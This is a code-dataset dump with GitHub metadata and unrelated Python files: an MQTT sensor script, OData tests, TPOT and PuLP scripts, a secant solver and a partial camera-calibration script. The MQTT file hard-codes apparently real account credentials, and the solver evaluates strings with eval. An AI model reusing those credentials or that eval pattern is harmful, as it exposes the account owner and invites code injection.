blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M โ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f4a498b737ad2dc6cb3637447f65439204746ae8 | c7fccea6d2d02ac92a28ed29377d88b1c7648d52 | /MQTT_SHT31.py | 325667a58683324c4124faa4017e7ba109ed9f19 | [] | no_license | GrantBrown1994/SensorBox | d201c2769759e2d87daaa63089789686394b03af | e3eb319227a9667279adafa4997462d756496dbf | refs/heads/master | 2021-05-16T00:43:36.508554 | 2018-05-25T17:11:38 | 2018-05-25T17:11:38 | 106,970,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,751 | py | import smbus
import time
import paho.mqtt.client as mqtt
import sys
# Cayenne/myDevices MQTT credentials.
# NOTE(review): credentials are hard-coded; consider loading them from a
# config file or environment variables instead of committing them.
username = "25476c20-af7d-11e7-bba6-6918eb39b85e"
password = "2c33743aed57caee5780d2252f9d9319d0d64bfe"
clientid = "e1a8cfd0-b018-11e7-bd7e-3193fab997a8"

mqttc = mqtt.Client(client_id=clientid)
mqttc.username_pw_set(username, password=password)
mqttc.connect("mqtt.mydevices.com", port=1883, keepalive=60)
mqttc.loop_start()

# One data channel per reading: 6 = Fahrenheit, 7 = Celsius, 8 = humidity.
topic_sht31_fahr = "v1/" + username + "/things/" + clientid + "/data/6"
topic_sht31_celcius = "v1/" + username + "/things/" + clientid + "/data/7"
topic_sht31_humidity = "v1/" + username + "/things/" + clientid + "/data/8"

time.sleep(10)  # Sleep to allow wireless to connect before starting MQTT

while True:
    try:
        # Get I2C bus
        bus = smbus.SMBus(1)
        # SHT31 address 0x44(68): trigger a single-shot measurement
        bus.write_i2c_block_data(0x44, 0x2C, [0x06])
        time.sleep(0.5)
        # SHT31 address 0x44(68):
        # read 6 bytes back from 0x00(00):
        # Temp MSB, Temp LSB, Temp CRC, Humidity MSB, Humidity LSB, Humidity CRC
        data = bus.read_i2c_block_data(0x44, 0x00, 6)

        # Convert the raw 16-bit readings to physical units.
        temp = data[0] * 256 + data[1]
        cTemp = -45 + (175 * temp / 65535.0)
        fTemp = -49 + (315 * temp / 65535.0)
        humidity = 100 * (data[3] * 256 + data[4]) / 65535.0

        # Publish each reading on its own channel.
        # Bug fix: all three branches previously tested `fTemp` (copy/paste
        # slip); each branch now guards the value it actually publishes.
        if fTemp is not None:
            fTemp180 = "temp,F=" + str(fTemp)
            mqttc.publish(topic_sht31_fahr, payload=fTemp180, retain=True)
        if cTemp is not None:
            cTemp180 = "temp,C=" + str(cTemp)
            mqttc.publish(topic_sht31_celcius, payload=cTemp180, retain=True)
        if humidity is not None:
            humidity180 = "rel_hum,%= " + str(humidity)
            mqttc.publish(topic_sht31_humidity, payload=humidity180, retain=True)
        time.sleep(5)
    except (EOFError, SystemExit, KeyboardInterrupt):
        # Clean shutdown on interrupt.
        mqttc.disconnect()
        sys.exit()
| [
"noreply@github.com"
] | GrantBrown1994.noreply@github.com |
4372d2665e92a011870b6e58af6f95b071f5b1d3 | c691d08794cb55c86b59873c8077e8a03cc1ba0a | /odata/tests/test_nw_reflect_model.py | 0c24c0f57ef4632cb7e67ba923f1987948e05c7d | [
"MIT"
] | permissive | i39/python-odata | 4c828b36bfd569a5ed1de860deb002403415d90c | 0c16bd188b0962360914eacf20483f7703843144 | refs/heads/master | 2021-05-11T02:31:50.493989 | 2018-01-21T21:03:16 | 2018-01-21T21:03:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,016 | py | # -*- coding: utf-8 -*-
import unittest
from odata.service import ODataService
# Public Northwind OData v4 demo service.
url = 'http://services.odata.org/V4/Northwind/Northwind.svc/'
# NOTE(review): entity reflection happens at import time and requires
# network access to the demo service.
Service = ODataService(url, reflect_entities=True)

# Reflected entity classes (None if reflection did not find them).
Customer = Service.entities.get('Customer')
Product = Service.entities.get('Product')
@unittest.skip('unavailable')
class NorthwindReflectModelReadTest(unittest.TestCase):
    """Read-only queries against the reflected Northwind model."""

    def test_query_one(self):
        """Two chained filters, taking the first match."""
        query = (Service.query(Customer)
                 .filter(Customer.ContactTitle.startswith('Sales'))
                 .filter(Customer.PostalCode == '68306'))
        first = query.first()
        assert first is not None, 'data is None'
        assert isinstance(first, Customer), 'Did not return Customer instance'
        assert first.PostalCode == '68306'

    def test_query_all(self):
        """Filter + limit + ordering returns a reasonably sized list."""
        query = (Service.query(Customer)
                 .filter(Customer.City != 'Berlin')
                 .limit(30)
                 .order_by(Customer.City.asc()))
        rows = query.all()
        assert rows is not None, 'data is None'
        assert len(rows) > 20, 'data length wrong'

    def test_iterating_query_result(self):
        """Query objects can be iterated directly."""
        for entity in Service.query(Customer).limit(20):
            assert isinstance(entity, Customer), 'Did not return Customer instance'

    def test_query_raw_data(self):
        """Selecting individual properties yields raw dicts."""
        raw = Service.query(Customer).select(Customer.CompanyName).first()
        assert isinstance(raw, dict), 'Did not return dict'
        assert Customer.CompanyName.name in raw

    def test_query_filters(self):
        """Nested or/grouped filter composition."""
        query = Service.query(Product)
        name_filter = query.grouped(
            query.or_(
                Product.ProductName.startswith('Chai'),
                Product.ProductName.startswith('Chang'),
            )
        )
        query = query.filter(
            query.or_(
                name_filter,
                Product.QuantityPerUnit == '12 - 550 ml bottles',
            )
        )
        assert len(query.all()) == 3, 'data length wrong'
| [
"tuomas.mursu@kapsi.fi"
] | tuomas.mursu@kapsi.fi |
81d516a9eb634a50a882dd4b4f7cdb158ce6b6f1 | c7bc23596a15ecf6e036f5e3e5839a6bc0c99d83 | /tpot_wrapper.py | 5651321901545f22765c2c9112167570c2193299 | [
"MIT"
] | permissive | inovex/automated-feature-engineering | b49f8648c708d6515d26be98eebb993fa7e910d0 | 0c21690397a2cfcd0ed96f5a8be6f9ba2f370d7e | refs/heads/master | 2022-11-23T17:18:55.937270 | 2020-08-05T13:43:52 | 2020-08-05T13:43:52 | 285,264,018 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,679 | py | import argparse
import os
import pickle
import time
from sklearn.metrics import mean_squared_error
from sklearn.metrics.scorer import make_scorer
from tpot import TPOTRegressor
from Data import DataHandler
from tpot_configuration import regressor_config
class TpotWrapper:
    """Wrapper around TPOT's genetic pipeline search for regression tasks.

    The TPOT configuration space is restricted so that the final estimator
    is the chosen *model* while preprocessing / feature-engineering steps
    are still explored. Results (best pipeline, evaluation history, pareto
    front) are exported below ``runs/<data>_<trainSize>/...``.
    """

    def __init__(self, dataFunction, generations=100, popSize=100, trainSize=0.7,
                 model: str = 'sklearn.tree.DecisionTreeRegressor',
                 preprocessed=True, folderID=None, nDataPoints=100000):
        """Store the search settings and derive the export path.

        dataFunction -- data loader returning train/test splits; the dataset
                        name is taken from its function name (after the first
                        underscore).
        model        -- fully qualified estimator class path, a TPOT config
                        dict mapping one class path to a parameter grid, or
                        one of the shorthand names below.
        """
        self.generations = generations
        self.popSize = popSize
        self.trainSize = trainSize
        self.model = model
        self.preprocessed = preprocessed
        self.nDataPoints = nDataPoints

        # For ease of use: map shorthand names onto full configurations.
        # The original substring test (`model in "DecisionTree"`) is kept
        # for backward compatibility, but guarded with `model and ...`:
        # an empty string is a substring of everything, and `None in <str>`
        # raises TypeError (e.g. when the --model CLI flag is omitted).
        if model and model in "DecisionTree":
            self.model = 'sklearn.tree.DecisionTreeRegressor'
        elif model and model in "RandomForest":
            self.model = {"sklearn.ensemble.RandomForestRegressor": {'n_estimators': [10]}}
        elif model and model in "LinearRegression":
            self.model = "sklearn.linear_model.LinearRegression"
        elif model and model in "LassoLarsCV":
            # Settings from autofeat
            self.model = {"sklearn.linear_model.LassoLarsCV": {'cv': [5]}}

        # Normalise to TPOT's config-dict form {class_path: param_grid}.
        if isinstance(self.model, str):
            self.model = {self.model: {}}
        # Short class name, e.g. "DecisionTreeRegressor".
        self.modelName = list(self.model.keys())[0].split(".")[-1]

        self.dataFunction = dataFunction
        self.dataUsedName = self.dataFunction.__name__.split("_")[1]

        # Export path
        self.savePath = f'{os.path.dirname(os.path.abspath(__file__))}/runs/{self.dataUsedName}_{self.trainSize}/{self.modelName}_gen{self.generations}_pop{self.popSize}'
        # Add folder with number that represents evaluation run
        self.savePath = DataHandler.createDictPath(self.savePath, folderID)

    def regression(self, timeMax=60):
        """Run the TPOT search (at most *timeMax* minutes) and export results."""

        def rmse_scorer(y_true, y_pred):
            # Root-mean-squared error; TPOT maximises, so it is negated via
            # greater_is_better=False below.
            return mean_squared_error(y_true, y_pred, squared=False)

        my_custom_scorer = make_scorer(rmse_scorer, greater_is_better=False)

        print(f"Starting regression with {self.modelName}")
        X_train, X_test, y_train, y_test = self.dataFunction(
            preprocessed=self.preprocessed, specifics="TPOT",
            trainSize=self.trainSize, nDataPoints=self.nDataPoints)

        # Base search space plus the chosen prediction model.
        config_copy = regressor_config.copy()
        config_copy.update(self.model)

        # TPOT automated feature engineering.
        start_time = time.time()
        tpot = TPOTRegressor(generations=self.generations, population_size=self.popSize, verbosity=2,
                             config_dict=config_copy, max_time_mins=timeMax,
                             max_eval_time_mins=30, cv=4, scoring=my_custom_scorer)
        tpot.fit(X_train, y_train)
        total_time = int(divmod(time.time() - start_time, 60)[0])

        print(tpot.evaluated_individuals_)
        print(f"Time: {total_time}")

        # Prediction score (scorer is negated, hence the minus sign).
        predictionScore = int(-tpot.score(X_test, y_test))
        print(f"Final MSE prediction score: {predictionScore}")

        # Export the best pipeline as a runnable Python file.
        tpot.export(f'{self.savePath}/time{total_time}_score{predictionScore}_trainSize{self.trainSize}_PIPE.py')
        # Export the evaluation history.
        with open(f'{self.savePath}/performance_history.pkl', "wb") as handle:
            pickle.dump(tpot.evaluated_individuals_, handle)
        # Export the pareto front of fitted pipelines.
        with open(f'{self.savePath}/PARETO.pkl', "wb") as handle:
            pickle.dump(tpot.pareto_front_fitted_pipelines_, handle)
# command-line for ease of use
# Guarded so that importing this module (e.g. to reuse TpotWrapper) does
# not trigger argument parsing or an accidental training run.
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='TPOT input parser')
    parser.add_argument('--time', type=int, help='Time for the optimisation in minutes', default=1)
    parser.add_argument('--model', help='Name of class chosen for evaluation')
    parser.add_argument('--data', help='Name of data')
    parser.add_argument('--problem', help='Regression or classification problem')
    parser.add_argument('--popSize', type=int, help='Population Size', default=100)
    parser.add_argument('--generations', type=int, help='Generation Size', default=100)
    parser.add_argument('--trainSize', type=float, help='Train size', default=0.7)
    parser.add_argument('--folderID', help='ID for folder')
    parser.add_argument('--nDataPoints', type=int, help='Reduce data to subsample size.', default=100000)
    args = parser.parse_args()

    tpotModel = TpotWrapper(model=args.model, dataFunction=DataHandler.stringToMethod(args.data),
                            generations=args.generations, popSize=args.popSize,
                            trainSize=args.trainSize, folderID=args.folderID,
                            nDataPoints=args.nDataPoints)

    if "reg" in args.problem:
        tpotModel.regression(args.time)
    else:
        print("Not supported")
| [
"jmeier@inovex.de"
] | jmeier@inovex.de |
22b68903022bfdd23bbd381ac4811f5ede188da6 | 1e3c9d8e9c959e2b2f0a90a95cf07dbaab3f5f22 | /mrp.py | 7409e30f216cbff8b135587009f0ef370e645583 | [] | no_license | vietnq68/mrp | d08a5bb4dc49944b65897ff278d7a1fdd54d746d | 9f198b1bb23746321c57d5bde077ec953359d0a5 | refs/heads/master | 2021-01-23T19:11:47.404671 | 2017-10-04T02:20:36 | 2017-10-04T02:20:36 | 102,811,260 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,664 | py | from pulp import *
import data_24
import data3
import data4
# Bill-of-materials structure and available stock, loaded from the dataset.
bom = data_24.data['bom']
materials = data_24.data['materials']

# needed number of each part for the level that part appears
# for example ['A_1','A_2','B_1',...] is number of A in level 1,2 and number of B in level 1
lp_vars = []

# variables for Simplex problem
# Filled in by the builder functions below; columns are parallel to lp_vars
# plus one extra trailing column for K (the product count).
A_eq = []
B_eq = []
B_ineq = []
A_ineq = []
objective = []
def get_variables():
    """Create one LP variable per (part, BOM level) pair.

    Variables are named "<part>_<level>", bounded above by the available
    amount, and integer-typed whenever that level's coefficient is an
    integer (continuous otherwise).
    """
    for part, available in materials.iteritems():
        for level, bill in bom.iteritems():
            options, coef = bill[0], bill[1]
            if part not in options:
                continue
            lp_vars.append(
                LpVariable(name=part + '_' + level,
                           lowBound=0,
                           upBound=available,
                           cat=LpInteger if isinstance(coef, int) else LpContinuous))
def get_objective():
    """Build objective coefficients: maximise K, the number of finished
    products; every per-part variable gets a zero coefficient."""
    objective.extend(0 for _ in lp_vars)
    objective.append(1)  # coef for K
def get_inequality_constraints():
    """Build stock constraints: total use of each part across all BOM
    levels must not exceed the available amount.

    Bug fix: the original compared the part name against the whole result
    of ``str.split`` (a list), which is never equal to a string, so every
    coefficient was 0 and the stock limits were never enforced. Compare
    against the part component of the "<part>_<level>" name instead.
    """
    for part, num in materials.iteritems():
        row = []
        for var in lp_vars:
            row.append(1 if part == var.name.split('_')[0] else 0)
        row.append(0)  # coef for K
        A_ineq.append(row)
        B_ineq.append(num)
def get_equality_constraints():
    """For every BOM level, the chosen parts must together supply exactly
    coef * K units: sum(vars at that level) - coef * K == 0."""
    for level, bill in bom.iteritems():
        options, coef = bill[0], bill[1]
        row = [1 if (var.name.split('_')[0] in options
                     and var.name.split('_')[1] == level) else 0
               for var in lp_vars]
        row.append(-coef)  # coef for K
        A_eq.append(row)
        B_eq.append(0)
def main():
    # Build and solve the LP: maximise the number K of complete products
    # that can be assembled from available parts under the BOM structure.
    prob = LpProblem("Dong bo san pham", LpMaximize)
    get_variables()
    get_objective()
    get_equality_constraints()
    get_inequality_constraints()
    # K = number of finished products; appended after the builders so the
    # extra trailing column they emitted lines up with this variable.
    lp_vars.append(LpVariable('K', 0, cat=LpInteger))
    num_of_vars = len(lp_vars)
    # objective
    prob += lpSum([objective[i] * lp_vars[i] for i in xrange(num_of_vars)])
    # equality constraints
    for i in xrange(len(A_eq)):
        prob += lpSum([A_eq[i][j] * lp_vars[j] for j in xrange(num_of_vars)]) == B_eq[i]
    # inequality constraints
    for i in xrange(len(A_ineq)):
        prob += lpSum([A_ineq[i][j] * lp_vars[j] for j in xrange(num_of_vars)]) <= B_ineq[i]
    prob.solve()
    # Solution: variable name -> optimal value.
    materials_dict = {}
    for v in prob.variables():
        materials_dict[v.name] = v.varValue
    print("Status:", LpStatus[prob.status])
    print "objective=", value(prob.objective)
    print materials_dict
if __name__ == '__main__':
main()
| [
"vietnq69@gmail.com"
] | vietnq69@gmail.com |
ddb41439d20acf8f01315a0d0c0f3e1b6b95ea71 | 80691ad524c7d466d354ad2f36f44b8d354199f9 | /calculo-secante.py | f9742274fb318d6391dfa377a3054d1a691b532a | [] | no_license | BrunoSouza22397/aulas-facul | 5ff442415ae3db4f65a06fea8710e9fe661ebf77 | 02985a47ce2b012de8effd803b444d5f9e8467a1 | refs/heads/main | 2023-03-23T16:19:26.193443 | 2021-03-19T01:49:52 | 2021-03-19T01:49:52 | 348,151,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | #recebe valor x e funcao (ex.: xยณ+2xยฒ+1) e retorna o valor de f(x)
def funcao(x, func):
    """Evaluate the expression *func*, written in terms of ``x``, at x.

    The expression is evaluated with ``x`` bound in the namespace instead
    of textually substituted. This fixes two bugs of the replace-based
    approach: negative values losing operator precedence (e.g. "x**2" at
    x = -2 became "-2**2" == -4 instead of 4), and accidental replacement
    of the letter 'x' inside function names such as "exp".
    """
    return eval(func, {"x": x})
# Finds a root of a function using the secant method.
# x0, x1 are initial guesses, TOL is the stopping tolerance on |f(x)|,
# N is the maximum number of iterations, func is the expression to solve.
def secante(x0, x1, TOL, N, func):
    """Print an approximate root of *func* found by the secant method,
    or a no-convergence message after N iterations.

    Performance: each function value is computed once and reused
    (the original re-evaluated funcao up to five times per iteration).
    NOTE(review): a zero secant slope (f1 == f0) still raises
    ZeroDivisionError, as in the original.
    """
    f0 = funcao(x0, func)
    f1 = funcao(x1, func)
    # First secant step.
    x2 = x1 - (x1 - x0) * f1 / (f1 - f0)
    f2 = funcao(x2, func)
    i = 1
    while abs(f2) > TOL and i <= N:
        # Shift the window and take the next secant step.
        x0, f0 = x1, f1
        x1, f1 = x2, f2
        x2 = x1 - (x1 - x0) * f1 / (f1 - f0)
        f2 = funcao(x2, func)
        i = i + 1
    if i > N:
        print('Nao houve convergencia!')
    if abs(f2) < TOL:
        print(x2)
secante(-1.8, -1.2, .1, 20, "x**4-3*x**3+3")
| [
"noreply@github.com"
] | BrunoSouza22397.noreply@github.com |
23165ad0aae4c5436e09829ae0ed3a254cd1866f | 4960036fd0b875527c2e749b75680fe4a80177d6 | /server/server/migrations/migrations/add_root_edition_037.py | 20ee4fb7533558301ec3d863ae5f13f052976317 | [] | no_license | suttacentral/suttacentral | ab62257d56c056b361d39a27029a94c2accb58ae | f6c4eb768c0ad8714a6b0a93d0160144048c5e7c | refs/heads/master | 2023-08-31T21:51:06.761377 | 2023-08-29T03:35:25 | 2023-08-29T03:35:25 | 89,286,697 | 133 | 31 | null | 2023-09-14T12:09:05 | 2017-04-24T21:00:39 | JavaScript | UTF-8 | Python | false | false | 299 | py | from common.arangodb import get_db
from migrations.base import Migration
class SecondMigration(Migration):
    """Create the empty ``root_edition`` document collection."""

    migration_id = 'add_root_edition_037'
    tasks = ['create_collections']

    def create_collections(self):
        # Plain document (non-edge) collection.
        get_db().create_collection('root_edition', edge=False)
"hd2935@qq.com"
] | hd2935@qq.com |
67ae476915049d80e94eaebfb3693d53042ab9c4 | 4307e838540d242d72a2c212780edcd30197325f | /app.py | 68b89506ff9e148289eb40dea9681552d698c0ab | [] | no_license | jsclose/timeline_project | 71cf662fcd3cf7ff82f90db15c8f72a54c596c02 | 0f6aa435bf21228dbe43d511a9c6d011e7e6fc52 | refs/heads/master | 2021-01-19T19:47:46.080653 | 2017-04-24T14:07:51 | 2017-04-24T14:07:51 | 88,449,831 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | from flask import Flask, render_template
from extensions import *
import controllers
import config
# Initialize Flask app with the template folder address
app = Flask(__name__, template_folder='templates')

# Register the controllers (blueprints defined in the controllers package).
app.register_blueprint(controllers.main)
app.register_blueprint(controllers.search)
app.register_blueprint(controllers.summary)

# NOTE(review): the session secret key is hard-coded; move it into
# config/environment for anything beyond local development.
app.secret_key = "cool group"

# Listen on external IPs
# For us, listen to port 3000 so you can just run 'python app.py' to start the server
if __name__ == '__main__':
    # listen on external IPs
    app.run(host=config.env['host'], port=config.env['port'], debug=True)
| [
"jsclose@umich.edu"
] | jsclose@umich.edu |
43e5919ac437c4fe278646de9ff1514277ae0018 | caca4763980dc10b47a8b3a701a5476bd72cb55a | /venv/bin/alembic | 7b783a9a86763c5af34f78fd7c691a124f06c512 | [] | no_license | igor-kachanov888/siteFastAPI | f8445d7415a7747970c948220ea139ca4def43af | 820c71b94e21321f19cdbd8df209def44529a67f | refs/heads/master | 2023-05-02T09:23:53.722075 | 2021-05-23T09:42:20 | 2021-05-23T09:42:20 | 368,632,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/home/igor/PycharmProjects/siteFastAPI/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from alembic.config import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"igor.kachanow@yandex,ru"
] | igor.kachanow@yandex,ru | |
83114007c9040ab96740953a3d82a7e8a98ea666 | 5b393000f921fc8ff58b9039066a7d21ad222a7c | /train_encoder.py | 3500dbbacfbcfdea2c61c48c3d1fedcd5d5cbd6d | [] | no_license | Plainwhites/Graduate | bfa66ec76206041ffaf6cb99a7dde96e904e684a | e4be4647f2fee1f78ee48ee6a75de03edd1dbb7b | refs/heads/master | 2021-05-11T11:37:41.409206 | 2018-02-03T17:35:21 | 2018-02-03T17:35:21 | 117,642,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,094 | py | # LSTM-autoencoder
from reader import *
from LSTMAutoencoder import *

# Constants
# batch_num = 10
# hidden_num = 512
# step_num = 43
# elem_num = 60
iteration = 10000  # number of training steps

# train data
folder = '/home/zy/Data/Florence/'
data = read_all_file(folder=folder)

# Model hyper-parameters. Config and SKELETON_JOINT_NUMBER come from the
# wildcard imports above (presumably reader / LSTMAutoencoder).
# NOTE(review): Config is constructed with *_size keyword names but read
# back below as *_num attributes (batch_num/step_num/elem_num) -- verify
# that Config maps these names.
config = Config(
    hidden_size=1024,
    elem_size=3*SKELETON_JOINT_NUMBER,
    step_size=43,
    layer_size=2,
    batch_size=10,
    keep_prob=0.5)

# placeholder list
# Input batch of shape (batch, steps, features), split into one tensor per
# time step for the LSTM autoencoder.
p_input = tf.placeholder(
    tf.float32,
    shape=(
        config.batch_num,
        config.step_num,
        config.elem_num))
p_inputs = [tf.squeeze(t, [1]) for t in tf.split(p_input, config.step_num, 1)]

ae = LSTMAutoencoder(config=config, inputs=p_inputs, is_training=True)

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    for i in range(iteration):
        """
        randomly generate the serial number of train data, index = [low, high)
        """
        # One randomly sampled batch per step; loss printed every iteration.
        t_input = random_input(data)
        (loss_val, _) = sess.run(
            [ae.loss, ae.train], {p_input: t_input})
        print('iter %d:' % (i + 1), loss_val)
| [
"noreply@github.com"
] | Plainwhites.noreply@github.com |
6e27170626bd5d4c4cb409cc4fe8e7ed80e75715 | dc9f2638209a9be235a1c4acc44fe2a26256c4b4 | /venv/projects/lib/python3.8/site-packages/pip/_vendor/chardet/mbcharsetprober.py | f875974d3c29050ff39044e0bf631df473d0e087 | [] | no_license | alwinruby/RealWorld | 4f5fcaed68fdd2d9fc37f5973fec365195cb3e9e | ec446f96f3545cb847429b5e33cefdc4f00ce432 | refs/heads/main | 2023-08-13T10:28:40.528047 | 2021-10-10T14:58:23 | 2021-10-10T14:58:23 | 408,079,742 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,413 | py | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetprober import CharSetProber
from .enums import ProbingState, MachineState
class MultiByteCharSetProber(CharSetProber):
    """
    MultiByteCharSetProber

    Base class for probers of multi-byte encodings. Subclasses supply a
    coding state machine (byte-sequence validity) and a character
    distribution analyzer (frequency-based confidence).
    """

    def __init__(self, lang_filter=None):
        super(MultiByteCharSetProber, self).__init__(lang_filter=lang_filter)
        # Set by subclasses: distribution analyser and coding state machine.
        self.distribution_analyzer = None
        self.coding_sm = None
        # Last two bytes seen, kept across feed() calls so characters split
        # between chunks can still be analysed.
        self._last_char = [0, 0]

    def reset(self):
        super(MultiByteCharSetProber, self).reset()
        if self.coding_sm:
            self.coding_sm.reset()
        if self.distribution_analyzer:
            self.distribution_analyzer.reset()
        self._last_char = [0, 0]

    @property
    def charset_name(self):
        # Subclasses must return the canonical charset name.
        raise NotImplementedError

    @property
    def language(self):
        # Subclasses must return the language being probed for.
        raise NotImplementedError

    def feed(self, byte_str):
        """Feed a chunk of bytes; returns the updated probing state."""
        for i in range(len(byte_str)):
            # Advance the coding state machine one byte at a time.
            coding_state = self.coding_sm.next_state(byte_str[i])
            if coding_state == MachineState.ERROR:
                # Illegal byte sequence for this encoding: rule it out.
                self.logger.debug('%s %s prober hit error at byte %s',
                                  self.charset_name, self.language, i)
                self._state = ProbingState.NOT_ME
                break
            elif coding_state == MachineState.ITS_ME:
                self._state = ProbingState.FOUND_IT
                break
            elif coding_state == MachineState.START:
                # A complete character was recognised; hand its last two
                # bytes (plus the declared char length) to the analyser.
                char_len = self.coding_sm.get_current_charlen()
                if i == 0:
                    # Character straddles the previous chunk boundary.
                    self._last_char[1] = byte_str[0]
                    self.distribution_analyzer.feed(self._last_char, char_len)
                else:
                    self.distribution_analyzer.feed(byte_str[i - 1:i + 1],
                                                    char_len)

        # Remember the final byte for the next feed() call.
        self._last_char[0] = byte_str[-1]

        if self.state == ProbingState.DETECTING:
            # Short-circuit once the analyser is confident enough.
            if (self.distribution_analyzer.got_enough_data() and
                    (self.get_confidence() > self.SHORTCUT_THRESHOLD)):
                self._state = ProbingState.FOUND_IT

        return self.state

    def get_confidence(self):
        return self.distribution_analyzer.get_confidence()
| [
"alwinsolanky@gmail.com"
] | alwinsolanky@gmail.com |
95b09bf9b3e4db89414199c59be246b83df7e9f0 | 835881ade89eaff933f81d186e69fcf9695d9392 | /bolero/utils/setup.py | dcce793f7c39de9bdf163a6985c1d62c94056aed | [
"BSD-3-Clause"
] | permissive | MMKrell/bolero | 9e056a88aa89332762c0f06d4f8e43fc4ac64018 | 0e011de35f2b364bb3bb7509bc38491762026643 | refs/heads/master | 2021-01-21T15:19:20.012273 | 2017-05-19T13:38:47 | 2017-05-19T13:38:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | def configuration(parent_package="", top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration("utils", parent_package, top_path)
config.set_options(ignore_setup_xxx_py=True,
assume_default_configuration=True,
delegate_options_to_subpackages=True,
quiet=True)
return config
if __name__ == "__main__":
from numpy.distutils.core import setup
setup(**configuration(top_path="").todict())
| [
"afabisch@informatik.uni-bremen.de"
] | afabisch@informatik.uni-bremen.de |
0fa87520e685f0ea8502ad09604969b26f0a7f5c | b5d23f3744ad581191cbc79a9210a7fb5c3a7ebf | /PasswordGen.py | 9907c6daee59aeec984cc701470d50ebd439bcb1 | [] | no_license | Mose16/Password-Gen | 206d18cb16de77dcb9c47898a174297595e8a2a3 | 065d0eb0f87665f29e4dbb91db172df95950d2c6 | refs/heads/master | 2020-04-22T06:42:23.259717 | 2019-02-11T21:09:51 | 2019-02-11T21:09:51 | 170,199,662 | 0 | 0 | null | 2019-02-11T21:09:52 | 2019-02-11T20:46:33 | Python | UTF-8 | Python | false | false | 452 | py | from random import randint
# Use the `secrets` module (not `random`) so the password comes from a
# cryptographically secure RNG -- `random` is not suitable for secrets.
import secrets
import string

# Lowercase alphabet; equivalent to the original hand-written list.
ALPHABET = list(string.ascii_lowercase)

length = int(input("How long do you want the password?"))

password = ""
# All but the last two characters are letters; roughly one in five is
# uppercased (same 1/5 odds as the original randint(0, 4) == 1 test).
for num in range(length - 2):
    letter = secrets.choice(ALPHABET)
    if secrets.randbelow(5) == 1:
        password += letter.upper()
    else:
        password += letter
# The final two characters are a random two-digit number (10-99).
password += str(secrets.randbelow(90) + 10)
print(password)
| [
"noreply@github.com"
] | Mose16.noreply@github.com |
18a3e7aa60ae9672e28b4e79b3c7a6a7d495fb82 | 458ee492ccd1084894db3d5954ebeda0c278a35c | /calibration/NUC/take_nuc_data_double_cam.py | c72d699d72f1f08d9148a4feaa036c24e1cfe8ef | [] | no_license | Polarization-Lab/IRCSP | 7295b53b99430af8293facf3c420e786286e3944 | 4fa811489660dd7a189f8d46f0ffd38dd54e3bfa | refs/heads/master | 2023-08-08T17:24:21.404050 | 2023-07-19T23:57:10 | 2023-07-19T23:57:10 | 288,764,467 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,876 | py | # -*- coding: utf-8 -*-
"""
single_cam_mono_sweep
Created on Wed Dec 9 13:12:18 2020
This script will sweep over wavelength on the monochomator
for a single measurement configuration.
This includes image capture for a single camera (no MS)
And a single polarization state (unpol, H,V, ect)
Output will be saved as a hdf5 file
Uses flirpy, make sure enviroment is open
uses python-usbtmc
@author: khart
"""
from flirpy.camera.boson import Boson
import matplotlib.pyplot as plt
import numpy as np
import h5py
import time

# Output location for the captured NUC (non-uniformity correction) data.
save_path = 'C:\\Users\\khart\\Documents\\IRCSP2_data\\NUC\\dec15\\'
name = '2imtest'

# choose the ROI
# NOTE(review): these ROI bounds are defined but never applied to the
# captured frames below -- full frames are saved.
ymin = 0;
ymax = 250;
xmin = 0;
xmax = 320;

# choose wavelengths
samps = 5;  # number of image/temperature samples per camera

# FPA temperatures and frame means, one slot per sample, per camera.
temp1 = np.zeros(samps);temp2 = np.zeros(samps)
avgs1 = np.zeros(samps);avgs2 = np.zeros(samps)
images1 = [];images2 = []

i =0;
while i <samps:
